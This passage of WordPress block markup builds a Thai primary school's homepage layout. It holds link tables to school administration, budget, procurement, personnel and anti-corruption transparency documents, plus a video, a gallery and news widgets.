href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 